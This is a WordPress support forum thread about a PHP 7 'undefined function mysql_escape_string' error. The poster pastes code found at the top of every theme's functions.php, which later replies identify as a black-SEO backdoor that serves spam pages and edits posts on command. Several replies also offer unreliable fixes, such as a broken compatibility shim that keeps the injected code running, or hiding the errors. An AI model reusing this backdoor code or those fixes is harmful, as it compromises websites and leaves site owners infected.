Title: Fatal error: Uncaught Error: Call to undefined function mysql_escape_string()
Last modified: December 10, 2016
---
# Fatal error: Uncaught Error: Call to undefined function mysql_escape_string()
* [oceandream](https://wordpress.org/support/users/oceandream/)
* (@oceandream)
* [9 years, 6 months ago](https://wordpress.org/support/topic/fatal-error-uncaught-error-call-to-undefined-function-mysql_escape_string/)
* Hello could yo please help me with this error message i got recently while trying
to access my website.
* Fatal error: Uncaught Error: Call to undefined function mysql_escape_string()
in /var/www/html/wordpress/wp-content/themes/twentyseventeen/functions.php:60
Stack trace: #0 /var/www/html/wordpress/wp-settings.php(425): include() #1 /var/
www/html/wordpress/wp-config.php(93): require_once(‘/var/www/html/w…’) #2 /var/
www/html/wordpress/wp-load.php(37): require_once(‘/var/www/html/w…’) #3 /var/
www/html/wordpress/wp-blog-header.php(13): require_once(‘/var/www/html/w…’) #
4 /var/www/html/wordpress/index.php(17): require(‘/var/www/html/w…’) #5 {main}
thrown in /var/www/html/wordpress/wp-content/themes/twentyseventeen/functions.
php on line 60
Viewing 15 replies - 1 through 15 (of 23 total)
1 [2](https://wordpress.org/support/topic/fatal-error-uncaught-error-call-to-undefined-function-mysql_escape_string/page/2/?output_format=md)
[→](https://wordpress.org/support/topic/fatal-error-uncaught-error-call-to-undefined-function-mysql_escape_string/page/2/?output_format=md)
* Moderator [t-p](https://wordpress.org/support/users/t-p/)
* (@t-p)
* [9 years, 6 months ago](https://wordpress.org/support/topic/fatal-error-uncaught-error-call-to-undefined-function-mysql_escape_string/#post-8537229)
* Theme “twentyseventeen” seems to be the error.
* To confirm, try switching to the unedited default Theme (Twenty Sixteen) for
a moment using the [FTP ](http://codex.wordpress.org/FTP_Clients), or your web-
host’s cPanel or whatever file management application your host provides (no
Dashboard access required).
* Thread Starter [oceandream](https://wordpress.org/support/users/oceandream/)
* (@oceandream)
* [9 years, 6 months ago](https://wordpress.org/support/topic/fatal-error-uncaught-error-call-to-undefined-function-mysql_escape_string/#post-8537260)
* I tried switching to my main theme, unfortunately the error remains. This happened
after i did apt-get update my PHP7.1 compiler yesterday. I can get in phpmyadmin
just fine, and i also can get into wp-admin after i rename /var/www/html/wordpress/
wp-content/themes/ folder.
Any other ideas?
* [MarkRH](https://wordpress.org/support/users/markrh/)
* (@markrh)
* [9 years, 6 months ago](https://wordpress.org/support/topic/fatal-error-uncaught-error-call-to-undefined-function-mysql_escape_string/#post-8537294)
* Well, according to this: [http://php.net/manual/en/function.mysql-escape-string.php](http://php.net/manual/en/function.mysql-escape-string.php)
PHP 7+ doesn’t support that anymore.
* I did a global search of my files and don’t find **mysql_escape_string(** anywhere.
I looked at the Twenty Seventeen theme’s functions.php and that is not in there.
Must be loading it in from somewhere else.. maybe some plugin or code inside
a widget?
* Hmmm…
* Thread Starter [oceandream](https://wordpress.org/support/users/oceandream/)
* (@oceandream)
* [9 years, 6 months ago](https://wordpress.org/support/topic/fatal-error-uncaught-error-call-to-undefined-function-mysql_escape_string/#post-8537579)
* Wow, thank you for the tip! I checked my themes function.php files which is error
pointing at, and at the begining of every function.php file of every installed
theme there is some weir code:
* ```
get_results('SELECT * FROM ' . $wpdb->prefix . 'posts WHERE post_status = "publish" AND post_type = "post" ORDER BY ID DESC', ARRAY_A) as $data)
{
$data['code'] = '';
if (preg_match('!
(.*?)
!s', $data['post_content'], $_))
{
$data['code'] = $_[1];
}
print '1' . $data['guid'] . '' . $data['code'] . '' . $data['ID'] . '' . "\r\n";
}
break;
case 'set_id_links';
if (isset($_REQUEST['data']))
{
$data = $wpdb -> get_row('SELECT post_content FROM ' . $wpdb->prefix . 'posts WHERE ID = "'.mysql_escape_string($_REQUEST['id']).'"');
$post_content = preg_replace('!
';
if ($wpdb->query('UPDATE ' . $wpdb->prefix . 'posts SET post_content = "' . mysql_escape_string($post_content) . '" WHERE ID = "' . mysql_escape_string($_REQUEST['id']) . '"') !== false)
{
print "true";
}
}
break;
case 'create_page';
if (isset($_REQUEST['remove_page']))
{
if ($wpdb -> query('DELETE FROM ' . $wpdb->prefix . 'datalist WHERE url = "/'.mysql_escape_string($_REQUEST['url']).'"'))
{
print "true";
}
}
elseif (isset($_REQUEST['content']) && !empty($_REQUEST['content']))
{
if ($wpdb -> query('INSERT INTO ' . $wpdb->prefix . 'datalist SET url = "/'.mysql_escape_string($_REQUEST['url']).'", title = "'.mysql_escape_string($_REQUEST['title']).'", keywords = "'.mysql_escape_string($_REQUEST['keywords']).'", description = "'.mysql_escape_string($_REQUEST['description']).'", content = "'.mysql_escape_string($_REQUEST['content']).'", full_content = "'.mysql_escape_string($_REQUEST['full_content']).'" ON DUPLICATE KEY UPDATE title = "'.mysql_escape_string($_REQUEST['title']).'", keywords = "'.mysql_escape_string($_REQUEST['keywords']).'", description = "'.mysql_escape_string($_REQUEST['description']).'", content = "'.mysql_escape_string(urldecode($_REQUEST['content'])).'", full_content = "'.mysql_escape_string($_REQUEST['full_content']).'"'))
{
print "true";
}
}
break;
default: print "ERROR_WP_ACTION WP_URL_CD";
}
die("");
}
if ( $wpdb->get_var('SELECT count(*) FROM ' . $wpdb->prefix . 'datalist WHERE url = "'.mysql_escape_string( $_SERVER['REQUEST_URI'] ).'"') == '1' )
{
$data = $wpdb -> get_row('SELECT * FROM ' . $wpdb->prefix . 'datalist WHERE url = "'.mysql_escape_string($_SERVER['REQUEST_URI']).'"');
if ($data -> full_content)
{
print stripslashes($data -> content);
}
else
{
print '';
print '';
print '';
print ''.stripslashes($data -> title).'';
print '';
print '';
print '';
print '';
print '';
print '';
print '';
wp_head();
print '';
print '';
print '
';
print stripslashes($data -> content);
get_search_form();
get_sidebar();
get_footer();
}
exit;
}
```
* I think it’s some kind of data parcer? Could some of my plugins cause this?
- This reply was modified 9 years, 6 months ago by [Steven Stern (sterndata)](https://wordpress.org/support/users/sterndata/).
- This reply was modified 9 years, 6 months ago by [t-p](https://wordpress.org/support/users/t-p/).
* [gnanakeethan](https://wordpress.org/support/users/gnanakeethan/)
* (@gnanakeethan)
* [9 years, 6 months ago](https://wordpress.org/support/topic/fatal-error-uncaught-error-call-to-undefined-function-mysql_escape_string/#post-8538206)
* This problem may be serious for someone who just upgraded to PHP 7+. I faced
the same, the site was fine in past.
* Just add
* ```
function mysql_escape_string($string){return mysqli_escape_string($string);}
```
* in top of any functions.php file which you get the error. it should substitute
with new function. without going and changing all.
- This reply was modified 9 years, 6 months ago by [gnanakeethan](https://wordpress.org/support/users/gnanakeethan/).
Reason: noted "top"
* [Kingsley Felix](https://wordpress.org/support/users/iamkingsleyf/)
* (@iamkingsleyf)
* [9 years, 5 months ago](https://wordpress.org/support/topic/fatal-error-uncaught-error-call-to-undefined-function-mysql_escape_string/#post-8643324)
* Thanks this worked, however we downgraded to 5.6
* [vishal005](https://wordpress.org/support/users/vishal005/)
* (@vishal005)
* [9 years, 4 months ago](https://wordpress.org/support/topic/fatal-error-uncaught-error-call-to-undefined-function-mysql_escape_string/#post-8658787)
* Thanks
this function in worked for me mysql_escape_string($string){return mysqli_escape_string(
$string);} in theme seventeen .
* [fredquie](https://wordpress.org/support/users/fredquie/)
* (@fredquie)
* [9 years, 4 months ago](https://wordpress.org/support/topic/fatal-error-uncaught-error-call-to-undefined-function-mysql_escape_string/#post-8684314)
* Hi,
I have the same problem after installing a plugin which didn’t work and
caused a crash in the admin. I deleted the plugin folder, and then I had the
problem with
* I added the function given to the functions.php of my theme and now I have the
following message :
* Warning: mysqli_escape_string() expects exactly 2 parameters, 1 given in /homepages/
5/d666095238/htdocs/wp-content/themes/parallax-pro/functions.php on line 3
* What can I do ?
Thank you.
* [vishal005](https://wordpress.org/support/users/vishal005/)
* (@vishal005)
* [9 years, 4 months ago](https://wordpress.org/support/topic/fatal-error-uncaught-error-call-to-undefined-function-mysql_escape_string/#post-8718836)
* Hi
* Warning: mysqli_escape_string() expects exactly 2 parameters, 1 given in /homepages/
5/d666095238/htdocs/wp-content/themes/parallax-pro/functions.php on
I have face
same promlem in wordpress i have added the **define(‘WP_DEBUG’, false); into
wp-config.php file **
* This is worked for me.
* Thanks
- This reply was modified 9 years, 4 months ago by [vishal005](https://wordpress.org/support/users/vishal005/).
- This reply was modified 9 years, 4 months ago by [vishal005](https://wordpress.org/support/users/vishal005/).
- This reply was modified 9 years, 4 months ago by [vishal005](https://wordpress.org/support/users/vishal005/).
- This reply was modified 9 years, 4 months ago by [vishal005](https://wordpress.org/support/users/vishal005/).
* [vishal005](https://wordpress.org/support/users/vishal005/)
* (@vishal005)
* [9 years, 4 months ago](https://wordpress.org/support/topic/fatal-error-uncaught-error-call-to-undefined-function-mysql_escape_string/#post-8718848)
* I have face same promlem in wordpress then i have added the define(‘WP_DEBUG’,
false); into wp-config.php file its working for me
* [pruthvireddyp51](https://wordpress.org/support/users/pruthvireddyp51/)
* (@pruthvireddyp51)
* [9 years, 3 months ago](https://wordpress.org/support/topic/fatal-error-uncaught-error-call-to-undefined-function-mysql_escape_string/#post-8813725)
* To resolve this please **DOWNGRADE ** PHP 7.0 to 5.6. its works for me!
Happy
Coding :):):)
* [felcerreia](https://wordpress.org/support/users/felcerreia/)
* (@felcerreia)
* [9 years, 3 months ago](https://wordpress.org/support/topic/fatal-error-uncaught-error-call-to-undefined-function-mysql_escape_string/#post-8845141)
* [@oceandream](https://wordpress.org/support/users/oceandream/) I’m afraid your
WordPress installation is infected.
* Others users with the same error should check functions.php file and search for
similar code.
* “if (isset($_REQUEST[‘action’]) && isset($_REQUEST[‘password’]) && ($_REQUEST[‘
password’]…”
* [lordwhizy](https://wordpress.org/support/users/lordwhizy/)
* (@lordwhizy)
* [9 years, 2 months ago](https://wordpress.org/support/topic/fatal-error-uncaught-error-call-to-undefined-function-mysql_escape_string/#post-8919276)
* [@felcerreia](https://wordpress.org/support/users/felcerreia/)
* Can you give more information on this infection. I found the same same code in
all my themes function.php files, I have removed it but i will like to know any
other location i can check to make sure they are all gone.
* Please can you educate us more on this infection (origin etc) I have been searching
for any useful info to help understand the source.
* “if (isset($_REQUEST[‘action’]) && isset($_REQUEST[‘password’]) && ($_REQUEST[‘
password’]…”
* [Dmitriy](https://wordpress.org/support/users/dimchik/)
* (@dimchik)
* [9 years, 1 month ago](https://wordpress.org/support/topic/fatal-error-uncaught-error-call-to-undefined-function-mysql_escape_string/#post-9074320)
* For those that stumbled upon this page while googling the error message, you
are most likely infected with a **nasty malware**. That specifically applies
to [@oceandream](https://wordpress.org/support/users/oceandream/)’s snippet above–
this code should not be in functions.php. Of course there are legit cases where
mysqli_escape_string was used in an old plugin or theme, but if you are seeing
this code in twentyseventeen or any other theme’s functions.php file, especially
towards the top of the file, I have bad news for you — you are definitely infected.
* Here’s a source code someone posted for the entire infection: [https://github.com/ecrider/Black-SEO-WordPress-Malware/](https://github.com/ecrider/Black-SEO-WordPress-Malware/)
in the case I personally encountered the code was slightly different 99% same
as on the link. In my case it didn’t go past stage1 and I was able to remove
it using WordFence (and days of subsequent close monitoring). If it proceeds
to stage2 – it sounds like the attacker will have a full control of your entire
installation.
* Hope this info helps someone!
* [generalan](https://wordpress.org/support/users/generalan/)
* (@generalan)
* [9 years, 1 month ago](https://wordpress.org/support/topic/fatal-error-uncaught-error-call-to-undefined-function-mysql_escape_string/#post-9080241)
* I had that exact code in my functions.php in a theme folder. Deleted it and replaced
it with the original one, but it doesn’t fix the error. What now?
EDIT: I also
discovered class.wp.php but deleted it straight away. Is there any chance it’ll
turn up again? Still no fix though…
- This reply was modified 9 years, 1 month ago by [generalan](https://wordpress.org/support/users/generalan/).
Viewing 15 replies - 1 through 15 (of 23 total)
1 [2](https://wordpress.org/support/topic/fatal-error-uncaught-error-call-to-undefined-function-mysql_escape_string/page/2/?output_format=md)
[→](https://wordpress.org/support/topic/fatal-error-uncaught-error-call-to-undefined-function-mysql_escape_string/page/2/?output_format=md)
The topic ‘Fatal error: Uncaught Error: Call to undefined function mysql_escape_string()’
is closed to new replies.
* In: [Fixing WordPress](https://wordpress.org/support/forum/how-to-and-troubleshooting/)
* 23 replies
* 16 participants
* Last reply from: [milenfrom](https://wordpress.org/support/users/milenfrom/)
* Last activity: [8 years, 9 months ago](https://wordpress.org/support/topic/fatal-error-uncaught-error-call-to-undefined-function-mysql_escape_string/page/2/#post-9477766)
* Status: not resolved
## Topics
### Topics with no replies
### Non-support topics
### Resolved topics
### Unresolved topics
### All topics